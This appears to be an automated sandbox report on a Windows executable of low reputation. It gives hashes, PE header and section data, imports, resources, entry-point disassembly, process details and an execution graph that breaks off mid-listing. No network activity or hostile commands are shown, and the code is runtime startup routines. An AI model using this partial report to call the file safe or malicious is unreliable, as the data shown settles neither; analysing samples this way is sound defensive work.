MD5:51570f6e590151159f4761e2fb4ecd60
SHA1:0cbfb5efe558a632fa1de3861c3b87389c987035
SHA256:659abb39eec218de66e2c1d917b22149ead7b743d3fe968ef840ef22318060fd
SHA512:38b767f85887d6f26dac90733f0a0d9e89df3cde2c3d084cab34a6bd7e9a002acd84b0261becd3c5078846e29544b7f7ad4ad96df364c8c9eeba1bd97c9321c5
SSDEEP:6144:ntH/xNLaAOvIBd7lAAxWS1elIoSN6WX+t45qxN7M:ntH5NLaAdDhAAEIFcWX+t4oxNQ
TLSH:7D74B00276C185B2D57328331A35AF20B67D7C301F768EDB9394695EDE321C09A36BA7
File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............w...w...w..<.V..w..<.T..w..<.U..w....Z..w.......w.......w.......w....$..w....4..w...w...v.......w.......w....X..w.......w.

File Icon

Icon Hash:1515d4d4442f2d2d

Static PE Info

General

Entrypoint:0x420780
Entrypoint Section:.text
Digitally signed:false
Imagebase:0x400000
Subsystem:windows gui
Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Time Stamp:0x6474CCD4 [Mon May 29 16:03:32 2023 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:5
OS Version Minor:1
File Version Major:5
File Version Minor:1
Subsystem Version Major:5
Subsystem Version Minor:1
Import Hash:0ae9e38912ff6bd742a1b9e5c003576a

Entrypoint Preview

Instruction
call 00007FD2BCBA2FDBh
jmp 00007FD2BCBA298Dh
int3
int3
int3
int3
int3
int3
push 00423A80h
push dword ptr fs:[00000000h]
mov eax, dword ptr [esp+10h]
mov dword ptr [esp+10h], ebp
lea ebp, dword ptr [esp+10h]
sub esp, eax
push ebx
push esi
push edi
mov eax, dword ptr [004407A8h]
xor dword ptr [ebp-04h], eax
xor eax, ebp
push eax
mov dword ptr [ebp-18h], esp
push dword ptr [ebp-08h]
mov eax, dword ptr [ebp-04h]
mov dword ptr [ebp-04h], FFFFFFFEh
mov dword ptr [ebp-08h], eax
lea eax, dword ptr [ebp-10h]
mov dword ptr fs:[00000000h], eax
ret
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
mov ecx, dword ptr [ebp-10h]
mov dword ptr fs:[00000000h], ecx
pop ecx
pop edi
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
push ecx
ret
push ebp
mov ebp, esp
sub esp, 0Ch
lea ecx, dword ptr [ebp-0Ch]
call 00007FD2BCB95821h
push 0043D14Ch
lea eax, dword ptr [ebp-0Ch]
push eax
call 00007FD2BCBA5635h
int3
jmp 00007FD2BCBA7508h
push ebp
mov ebp, esp
and dword ptr [00463D58h], 00000000h
sub esp, 24h
or dword ptr [004407A0h], 01h
push 0000000Ah
call dword ptr [004341C4h]
test eax, eax
je 00007FD2BCBA2CC2h
and dword ptr [ebp-10h], 00000000h
xor eax, eax
push ebx
push esi
push edi
xor ecx, ecx
lea edi, dword ptr [ebp-24h]

Rich Headers

Programming Language:
  • [ C ] VS2008 SP1 build 30729
  • [IMP] VS2008 SP1 build 30729

Data Directories

NameVirtual AddressVirtual Size Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT0x3e3800x34.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT0x3e3b40x50.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE0x660000xdff8.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
IMAGE_DIRECTORY_ENTRY_BASERELOC0x740000x23dc.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG0x3c1b00x54.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
IMAGE_DIRECTORY_ENTRY_TLS0x00x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x366a80x40.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
IMAGE_DIRECTORY_ENTRY_IAT0x340000x278.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x3d85c0x120.rdata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

Sections

NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
.text0x10000x32dbc0x32e0059fca22eb14bf065790ccabf936fb764False0.5921807816339066data6.705384121865264IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata0x340000xb1d00xb2003d7416119125f570d6c385b5ba208d7aFalse0.46034497893258425data5.270635796862559IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data0x400000x247500x1200edc39ed5cd62e969c2b4607a1a95cf98False0.4058159722222222data4.083550519415643IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.didat0x650000x1a40x200185ed7102f068a73891dd850643e3d14False0.46484375data3.50335535460232IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc0x660000xdff80xe000699399d7d2e63f9a36984a221fc02f75False0.6373465401785714data6.63871928699419IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc0x740000x23dc0x2400539b0c53eda4d1d9ffe2e69d5037d71fFalse0.7864583333333334data6.678617573231213IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

NameRVASizeTypeLanguageCountryZLIB Complexity
PNG0x666500xb45PNG image data, 93 x 302, 8-bit/color RGB, non-interlacedEnglishUnited States1.0027729636048528
PNG0x671980x15a9PNG image data, 186 x 604, 8-bit/color RGB, non-interlacedEnglishUnited States0.9363390441839495
RT_ICON0x687480x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, resolution 2834 x 2834 px/m, 256 important colorsEnglishUnited States0.47832369942196534
RT_ICON0x68cb00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, resolution 2834 x 2834 px/m, 256 important colorsEnglishUnited States0.5410649819494585
RT_ICON0x695580xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, resolution 2834 x 2834 px/m, 256 important colorsEnglishUnited States0.4933368869936034
RT_ICON0x6a4000x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/mEnglishUnited States0.5390070921985816
RT_ICON0x6a8680x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/mEnglishUnited States0.41393058161350843
RT_ICON0x6b9100x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/mEnglishUnited States0.3479253112033195
RT_ICON0x6deb80x3d71PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9809269502193401
RT_DIALOG0x725880x286dataEnglishUnited States0.5092879256965944
RT_DIALOG0x723580x13adataEnglishUnited States0.60828025477707
RT_DIALOG0x724980xecdataEnglishUnited States0.6991525423728814
RT_DIALOG0x722280x12edataEnglishUnited States0.5927152317880795
RT_DIALOG0x71ef00x338dataEnglishUnited States0.45145631067961167
RT_DIALOG0x71c980x252dataEnglishUnited States0.5757575757575758
RT_STRING0x72f680x1e2dataEnglishUnited States0.3900414937759336
RT_STRING0x731500x1ccdataEnglishUnited States0.4282608695652174
RT_STRING0x733200x1b8dataEnglishUnited States0.45681818181818185
RT_STRING0x734d80x146dataEnglishUnited States0.5153374233128835
RT_STRING0x736200x46cdataEnglishUnited States0.3454063604240283
RT_STRING0x73a900x166dataEnglishUnited States0.49162011173184356
RT_STRING0x73bf80x152dataEnglishUnited States0.5059171597633136
RT_STRING0x73d500x10adataEnglishUnited States0.49624060150375937
RT_STRING0x73e600xbcdataEnglishUnited States0.6329787234042553
RT_STRING0x73f200xd6dataEnglishUnited States0.5747663551401869
RT_GROUP_ICON0x71c300x68dataEnglishUnited States0.7019230769230769
RT_MANIFEST0x728100x753XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.3957333333333333

Imports

DLLImport
KERNEL32.dllGetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, GetCurrentProcessId, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, InterlockedDecrement, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetTimeFormatW, GetDateFormatW, LocalFree, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetNumberFormatW, DecodePointer, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapReAlloc, HeapAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage
OLEAUT32.dllSysAllocString, SysFreeString, VariantClear
gdiplus.dllGdipAlloc, GdipDisposeImage, GdipCloneImage, GdipCreateBitmapFromStream, GdipCreateBitmapFromStreamICM, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipFree

Possible Origin

Language of compilation systemCountry where language is spokenMap
EnglishUnited States

Network Behavior

No network behavior found

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

System Behavior

General

Target ID:0
Start time:09:41:20
Start date:30/09/2024
Path:C:\Users\user\Desktop\MpkkG8XzhJ.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\Desktop\MpkkG8XzhJ.exe"
Imagebase:0xb0000
File size:344'623 bytes
MD5 hash:51570F6E590151159F4761E2FB4ECD60
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:low
Has exited:true

Disassembly

Reset < >

    Execution Graph

    Execution Coverage:9.6%
    Dynamic/Decrypted Code Coverage:0%
    Signature Coverage:9.9%
    Total number of Nodes:1549
    Total number of Limit Nodes:45
    execution_graph 24109 bb20a 24110 bb218 24109->24110 24111 bb21f 24109->24111 24112 bb22c GetStdHandle 24111->24112 24119 bb23b 24111->24119 24112->24119 24113 bb293 WriteFile 24113->24119 24114 bb25f 24115 bb264 WriteFile 24114->24115 24114->24119 24115->24114 24115->24119 24117 bb325 24121 b7951 78 API calls 24117->24121 24119->24110 24119->24113 24119->24114 24119->24115 24119->24117 24120 b765a 79 API calls 24119->24120 24120->24119 24121->24110 26193 cc306 GetDlgItem EnableWindow ShowWindow SendMessageW 26117 b1800 87 API calls Concurrency::cancel_current_task 24157 dd201 31 API calls _ValidateLocalCookies 26118 cb400 GdipDisposeImage GdipFree 24158 d0602 24159 d060e ___scrt_is_nonwritable_in_current_image 24158->24159 24190 d019c 24159->24190 24161 d0615 24162 d0768 24161->24162 24165 d063f 24161->24165 24267 d09fa 4 API calls 2 library calls 24162->24267 24164 d076f 24260 d930a 24164->24260 24175 d067e ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 24165->24175 24201 d9ead 24165->24201 24172 d065e 24174 d06df 24209 d0b15 GetStartupInfoW __cftof 24174->24209 24175->24174 24263 d8dfc 38 API calls _abort 24175->24263 24177 d06e5 24210 d9dfe 51 API calls 24177->24210 24180 d06ed 24211 cf04c 24180->24211 24184 d0701 24184->24164 24185 d0705 24184->24185 24186 d070e 24185->24186 24265 d92ad 28 API calls _abort 24185->24265 24266 d030d 12 API calls ___scrt_uninitialize_crt 24186->24266 24189 d0716 24189->24172 24191 d01a5 24190->24191 24269 d0816 IsProcessorFeaturePresent 24191->24269 24193 d01b1 24270 d3bde 24193->24270 24195 d01b6 24200 d01ba 24195->24200 24278 d9d37 24195->24278 24198 d01d1 24198->24161 24200->24161 24204 d9ec4 24201->24204 24202 d0d6c _ValidateLocalCookies 5 API calls 24203 d0658 24202->24203 24203->24172 24205 d9e51 24203->24205 24204->24202 24208 d9e80 24205->24208 24206 d0d6c _ValidateLocalCookies 5 API calls 24207 d9ea9 24206->24207 24207->24175 24208->24206 24209->24177 24210->24180 24414 c1b7c 24211->24414 24215 cf06c 24463 cbd0b 24215->24463 24217 cf075 __cftof 24218 cf088 GetCommandLineW 24217->24218 24219 cf12c GetModuleFileNameW SetEnvironmentVariableW GetLocalTime 24218->24219 24220 cf09b 24218->24220 24478 b4a20 24219->24478 24467 cd6f8 24220->24467 24225 cf0a9 OpenFileMappingW 24229 cf11d CloseHandle 24225->24229 24230 cf0c1 MapViewOfFile 24225->24230 24226 cf126 24472 ced1e 24226->24472 24229->24219 24232 cf116 UnmapViewOfFile 24230->24232 24234 cf0d2 __InternalCxxFrameHandler 24230->24234 24232->24229 24237 ced1e 2 API calls 24234->24237 24240 cf0ee 24237->24240 24239 ca0c7 27 API calls 24241 cf1f3 DialogBoxParamW 24239->24241 24511 c0695 83 API calls 24240->24511 24246 cf22d 24241->24246 24243 cf102 24512 c074b 83 API calls _wcslen 24243->24512 24245 cf10d 24245->24232 24247 cf23f Sleep 24246->24247 24248 cf246 24246->24248 24247->24248 24250 cf254 24248->24250 24513 cbfa3 CompareStringW SetCurrentDirectoryW __cftof _wcslen 24248->24513 24251 cf273 DeleteObject 24250->24251 24252 cf28f 24251->24252 24253 cf288 DeleteObject 24251->24253 24254 cf2c0 24252->24254 24255 cf2d2 24252->24255 24253->24252 24514 ced7b 6 API calls 24254->24514 24508 cbd71 24255->24508 24258 cf2c6 CloseHandle 24258->24255 24259 cf30c 24264 d0b4b GetModuleHandleW 24259->24264 24787 d9087 24260->24787 24263->24174 24264->24184 24265->24186 24266->24189 24267->24164 24269->24193 24282 d4c87 24270->24282 24274 d3bef 24275 d3bfa 24274->24275 24296 d4cc3 DeleteCriticalSection 24274->24296 24275->24195 24277 d3be7 24277->24195 24323 dd20a 24278->24323 24281 d3bfd 7 API calls 2 library calls 24281->24200 24283 d4c90 24282->24283 24285 d4cb9 24283->24285 24286 d3be3 24283->24286 24297 d4ecc 24283->24297 24302 d4cc3 DeleteCriticalSection 24285->24302 24286->24277 24288 d3d0c 24286->24288 24316 d4ddd 24288->24316 24292 d3d2f 24293 d3d3c 24292->24293 24322 d3d3f 6 API calls ___vcrt_FlsFree 24292->24322 24293->24274 24295 d3d21 24295->24274 24296->24277 24303 d4cf2 24297->24303 24300 d4f04 InitializeCriticalSectionAndSpinCount 24301 d4eef 24300->24301 24301->24283 24302->24286 24304 d4d13 24303->24304 24305 d4d0f 24303->24305 24304->24305 24306 d4d7b GetProcAddress 24304->24306 24309 d4d6c 24304->24309 24311 d4d92 LoadLibraryExW 24304->24311 24305->24300 24305->24301 24306->24305 24308 d4d89 24306->24308 24308->24305 24309->24306 24310 d4d74 FreeLibrary 24309->24310 24310->24306 24312 d4da9 GetLastError 24311->24312 24313 d4dd9 24311->24313 24312->24313 24314 d4db4 ___vcrt_FlsFree 24312->24314 24313->24304 24314->24313 24315 d4dca LoadLibraryExW 24314->24315 24315->24304 24317 d4cf2 ___vcrt_FlsFree 5 API calls 24316->24317 24318 d4df7 24317->24318 24319 d4e10 TlsAlloc 24318->24319 24320 d3d16 24318->24320 24320->24295 24321 d4e8e 6 API calls ___vcrt_FlsFree 24320->24321 24321->24292 24322->24295 24324 dd227 24323->24324 24327 dd223 24323->24327 24324->24327 24329 db850 24324->24329 24326 d01c3 24326->24198 24326->24281 24341 d0d6c 24327->24341 24330 db85c ___scrt_is_nonwritable_in_current_image 24329->24330 24348 dbde1 EnterCriticalSection 24330->24348 24332 db863 24349 dd6d8 24332->24349 24334 db872 24340 db881 24334->24340 24362 db6d9 29 API calls 24334->24362 24337 db87c 24363 db78f GetStdHandle GetFileType 24337->24363 24339 db892 _abort 24339->24324 24364 db89d LeaveCriticalSection _abort 24340->24364 24342 d0d75 IsProcessorFeaturePresent 24341->24342 24343 d0d74 24341->24343 24345 d0db7 24342->24345 24343->24326 24413 d0d7a SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 24345->24413 24347 d0e9a 24347->24326 24348->24332 24350 dd6e4 ___scrt_is_nonwritable_in_current_image 24349->24350 24351 dd708 24350->24351 24352 dd6f1 24350->24352 24365 dbde1 EnterCriticalSection 24351->24365 24373 da7db 20 API calls _abort 24352->24373 24355 dd6f6 24374 d51a9 26 API calls ___std_exception_copy 24355->24374 24357 dd700 _abort 24357->24334 24358 dd740 24375 dd767 LeaveCriticalSection _abort 24358->24375 24360 dd714 24360->24358 24366 dd629 24360->24366 24362->24337 24363->24340 24364->24339 24365->24360 24376 dc2e6 24366->24376 24368 dd648 24390 da65a 24368->24390 24369 dd63b 24369->24368 24383 dc0ba 24369->24383 24372 dd69a 24372->24360 24373->24355 24374->24357 24375->24357 24381 dc2f3 _abort 24376->24381 24377 dc333 24397 da7db 20 API calls _abort 24377->24397 24378 dc31e RtlAllocateHeap 24379 dc331 24378->24379 24378->24381 24379->24369 24381->24377 24381->24378 24396 d8e4c 7 API calls 2 library calls 24381->24396 24398 dbe48 24383->24398 24386 dc0ff InitializeCriticalSectionAndSpinCount 24387 dc0ea 24386->24387 24388 d0d6c _ValidateLocalCookies 5 API calls 24387->24388 24389 dc116 24388->24389 24389->24369 24391 da665 RtlFreeHeap 24390->24391 24392 da68e _free 24390->24392 24391->24392 24393 da67a 24391->24393 24392->24372 24412 da7db 20 API calls _abort 24393->24412 24395 da680 GetLastError 24395->24392 24396->24381 24397->24379 24399 dbe78 24398->24399 24401 dbe74 24398->24401 24399->24386 24399->24387 24400 dbe98 24400->24399 24403 dbea4 GetProcAddress 24400->24403 24401->24399 24401->24400 24405 dbee4 24401->24405 24404 dbeb4 _abort 24403->24404 24404->24399 24406 dbefa 24405->24406 24407 dbf05 LoadLibraryExW 24405->24407 24406->24401 24408 dbf3a 24407->24408 24409 dbf22 GetLastError 24407->24409 24408->24406 24411 dbf51 FreeLibrary 24408->24411 24409->24408 24410 dbf2d LoadLibraryExW 24409->24410 24410->24408 24411->24406 24412->24395 24413->24347 24515 cffc0 24414->24515 24417 c1c00 24421 c1f2d GetModuleFileNameW 24417->24421 24526 d89de 42 API calls 2 library calls 24417->24526 24418 c1ba1 GetProcAddress 24419 c1bba 24418->24419 24420 c1bd2 GetProcAddress 24418->24420 24419->24420 24422 c1be4 24420->24422 24430 c1f4b 24421->24430 24422->24417 24424 c1e6d 24424->24421 24425 c1e78 GetModuleFileNameW CreateFileW 24424->24425 24426 c1ea8 SetFilePointer 24425->24426 24427 c1f21 CloseHandle 24425->24427 24426->24427 24428 c1eb6 ReadFile 24426->24428 24427->24421 24428->24427 24432 c1ed4 24428->24432 24433 c1fad GetFileAttributesW 24430->24433 24435 c1f76 CompareStringW 24430->24435 24436 c1fc5 24430->24436 24517 bc619 24430->24517 24520 c1b34 24430->24520 24432->24427 24434 c1b34 2 API calls 24432->24434 24433->24430 24433->24436 24434->24432 24435->24430 24437 c1fd0 24436->24437 24440 c2005 24436->24440 24439 c1fe9 GetFileAttributesW 24437->24439 24441 c2001 24437->24441 24438 c2114 24462 cb64d GetCurrentDirectoryW 24438->24462 24439->24437 24439->24441 24440->24438 24442 bc619 GetVersionExW 24440->24442 24441->24440 24443 c201f 24442->24443 24444 c208c 24443->24444 24445 c2026 24443->24445 24446 b4a20 _swprintf 51 API calls 24444->24446 24447 c1b34 2 API calls 24445->24447 24448 c20b4 AllocConsole 24446->24448 24449 c2030 24447->24449 24450 c210c ExitProcess 24448->24450 24451 c20c1 GetCurrentProcessId AttachConsole 24448->24451 24452 c1b34 2 API calls 24449->24452 24531 d4f93 24451->24531 24454 c203a 24452->24454 24527 bf937 24454->24527 24456 c20e2 GetStdHandle WriteConsoleW Sleep FreeConsole 24456->24450 24458 b4a20 _swprintf 51 API calls 24459 c2068 24458->24459 24460 bf937 53 API calls 24459->24460 24461 c2077 24460->24461 24461->24450 24462->24215 24464 c1b34 2 API calls 24463->24464 24465 cbd1f OleInitialize 24464->24465 24466 cbd42 GdiplusStartup SHGetMalloc 24465->24466 24466->24217 24469 cd702 24467->24469 24468 cd818 24468->24225 24468->24226 24469->24468 24470 c32f7 CharUpperW 24469->24470 24556 c074b 83 API calls _wcslen 24469->24556 24470->24469 24473 cffc0 24472->24473 24474 ced2b SetEnvironmentVariableW 24473->24474 24476 ced4e 24474->24476 24475 ced76 24475->24219 24476->24475 24477 ced6a SetEnvironmentVariableW 24476->24477 24477->24475 24557 b49f3 24478->24557 24481 cc8bd LoadBitmapW 24482 cc8de 24481->24482 24483 cc8eb GetObjectW 24481->24483 24625 cb6c2 FindResourceW 24482->24625 24487 cc8fa 24483->24487 24620 cb5c6 24487->24620 24488 cc950 24500 bed62 24488->24500 24490 cc92c 24641 cb605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24490->24641 24491 cb6c2 13 API calls 24493 cc91d 24491->24493 24493->24490 24495 cc923 DeleteObject 24493->24495 24494 cc934 24642 cb5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24494->24642 24495->24490 24497 cc93d 24643 cb80c 9 API calls 24497->24643 24499 cc944 DeleteObject 24499->24488 24654 bed87 24500->24654 24505 ca0c7 24506 cfeae 27 API calls 24505->24506 24507 ca0e6 24506->24507 24507->24239 24509 cbda0 GdiplusShutdown CoUninitialize 24508->24509 24509->24259 24511->24243 24512->24245 24513->24250 24514->24258 24516 c1b86 GetModuleHandleW 24515->24516 24516->24417 24516->24418 24518 bc669 24517->24518 24519 bc62d GetVersionExW 24517->24519 24518->24430 24519->24518 24521 cffc0 24520->24521 24522 c1b41 GetSystemDirectoryW 24521->24522 24523 c1b59 24522->24523 24524 c1b77 24522->24524 24525 c1b6a LoadLibraryW 24523->24525 24524->24430 24525->24524 24526->24424 24528 bf947 24527->24528 24533 bf968 24528->24533 24532 d4f9b 24531->24532 24532->24456 24532->24532 24539 becd0 24533->24539 24536 bf98b LoadStringW 24537 bf965 24536->24537 24538 bf9a2 LoadStringW 24536->24538 24537->24458 24538->24537 24544 bec0c 24539->24544 24541 beced 24542 bed02 24541->24542 24552 bed10 26 API calls 24541->24552 24542->24536 24542->24537 24545 bec24 24544->24545 24551 beca4 _strncpy 24544->24551 24547 bec48 24545->24547 24553 c30e5 WideCharToMultiByte 24545->24553 24550 bec79 24547->24550 24554 bf8d1 50 API calls __vsnprintf 24547->24554 24555 d7561 26 API calls 3 library calls 24550->24555 24551->24541 24552->24542 24553->24547 24554->24550 24555->24551 24556->24469 24558 b4a0a __vswprintf_c_l 24557->24558 24561 d72d2 24558->24561 24564 d5395 24561->24564 24565 d53bd 24564->24565 24566 d53d5 24564->24566 24581 da7db 20 API calls _abort 24565->24581 24566->24565 24568 d53dd 24566->24568 24583 d5934 24568->24583 24569 d53c2 24582 d51a9 26 API calls ___std_exception_copy 24569->24582 24573 d0d6c _ValidateLocalCookies 5 API calls 24575 b4a14 SetEnvironmentVariableW GetModuleHandleW LoadIconW 24573->24575 24575->24481 24576 d5465 24592 d5ce4 51 API calls 4 library calls 24576->24592 24579 d53cd 24579->24573 24580 d5470 24593 d59b7 20 API calls _free 24580->24593 24581->24569 24582->24579 24584 d53ed 24583->24584 24585 d5951 24583->24585 24591 d58ff 20 API calls 2 library calls 24584->24591 24585->24584 24594 da505 GetLastError 24585->24594 24587 d5972 24614 daae6 38 API calls __cftof 24587->24614 24589 d598b 24615 dab13 38 API calls __cftof 24589->24615 24591->24576 24592->24580 24593->24579 24595 da51b 24594->24595 24596 da521 24594->24596 24616 dc00b 11 API calls 2 library calls 24595->24616 24598 dc2e6 _abort 20 API calls 24596->24598 24599 da570 SetLastError 24596->24599 24600 da533 24598->24600 24599->24587 24602 da53b 24600->24602 24617 dc061 11 API calls 2 library calls 24600->24617 24604 da65a _free 20 API calls 24602->24604 24603 da550 24603->24602 24605 da557 24603->24605 24606 da541 24604->24606 24618 da370 20 API calls _abort 24605->24618 24607 da57c SetLastError 24606->24607 24619 da0e4 38 API calls _abort 24607->24619 24609 da562 24611 da65a _free 20 API calls 24609->24611 24613 da569 24611->24613 24613->24599 24613->24607 24614->24589 24615->24584 24616->24596 24617->24603 24618->24609 24644 cb5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24620->24644 24622 cb5cd 24623 cb5d9 24622->24623 24645 cb605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24622->24645 24623->24488 24623->24490 24623->24491 24626 cb7d3 24625->24626 24627 cb6e5 SizeofResource 24625->24627 24626->24483 24626->24487 24627->24626 24628 cb6fc LoadResource 24627->24628 24628->24626 24629 cb711 LockResource 24628->24629 24629->24626 24630 cb722 GlobalAlloc 24629->24630 24630->24626 24631 cb73d GlobalLock 24630->24631 24632 cb7cc GlobalFree 24631->24632 24633 cb74c __InternalCxxFrameHandler 24631->24633 24632->24626 24634 cb754 CreateStreamOnHGlobal 24633->24634 24635 cb76c 24634->24635 24636 cb7c5 GlobalUnlock 24634->24636 24646 cb626 GdipAlloc 24635->24646 24636->24632 24639 cb79a GdipCreateHBITMAPFromBitmap 24640 cb7b0 24639->24640 24640->24636 24641->24494 24642->24497 24643->24499 24644->24622 24645->24623 24647 cb638 24646->24647 24648 cb645 24646->24648 24650 cb3b8 24647->24650 24648->24636 24648->24639 24648->24640 24651 cb3d9 GdipCreateBitmapFromStreamICM 24650->24651 24652 cb3e0 GdipCreateBitmapFromStream 24650->24652 24653 cb3e5 24651->24653 24652->24653 24653->24648 24655 bed95 __EH_prolog 24654->24655 24656 bedc4 GetModuleFileNameW 24655->24656 24657 bedf5 24655->24657 24658 bedde 24656->24658 24700 bab40 24657->24700 24658->24657 24660 bee51 24711 d7720 24660->24711 24662 bf581 79 API calls 24665 bee25 24662->24665 24665->24660 24665->24662 24678 bf06a 24665->24678 24666 bee64 24667 d7720 26 API calls 24666->24667 24675 bee76 ___vcrt_FlsFree 24667->24675 24668 befa5 24668->24678 24747 bb000 82 API calls 24668->24747 24672 befbf ___std_exception_copy 24673 bae60 83 API calls 24672->24673 24672->24678 24676 befe8 ___std_exception_copy 24673->24676 24675->24668 24675->24678 24725 bb110 24675->24725 24741 bae60 24675->24741 24746 bb000 82 API calls 24675->24746 24676->24678 24683 beff3 _wcslen ___std_exception_copy ___vcrt_FlsFree 24676->24683 24748 c2ec2 MultiByteToWideChar 24676->24748 24734 ba801 24678->24734 24679 bf479 24690 bf4fe 24679->24690 24754 da08e 26 API calls 2 library calls 24679->24754 24681 bf48e 24755 d8a08 26 API calls 2 library calls 24681->24755 24683->24678 24683->24679 24695 c30e5 WideCharToMultiByte 24683->24695 24749 bf8d1 50 API calls __vsnprintf 24683->24749 24750 d7561 26 API calls 3 library calls 24683->24750 24751 da08e 26 API calls 2 library calls 24683->24751 24752 d8a08 26 API calls 2 library calls 24683->24752 24753 bf59c 79 API calls 24683->24753 24684 bf4e6 24756 bf59c 79 API calls 24684->24756 24685 bf534 24687 d7720 26 API calls 24685->24687 24689 bf54d 24687->24689 24691 d7720 26 API calls 24689->24691 24690->24685 24692 bf581 79 API calls 24690->24692 24691->24678 24692->24690 24695->24683 24698 bf5be GetModuleHandleW FindResourceW 24699 bed75 24698->24699 24699->24505 24701 bab4a 24700->24701 24702 babab CreateFileW 24701->24702 24703 babcc GetLastError 24702->24703 24707 bac1b 24702->24707 24757 bcf32 24703->24757 24705 babec 24706 babf0 CreateFileW GetLastError 24705->24706 24705->24707 24706->24707 24708 bac15 24706->24708 24709 bac45 SetFileTime 24707->24709 24710 bac5f 24707->24710 24708->24707 24709->24710 24710->24665 24712 d7759 24711->24712 24713 d775d 24712->24713 24724 d7785 24712->24724 24761 da7db 20 API calls _abort 24713->24761 24715 d7762 24762 d51a9 26 API calls 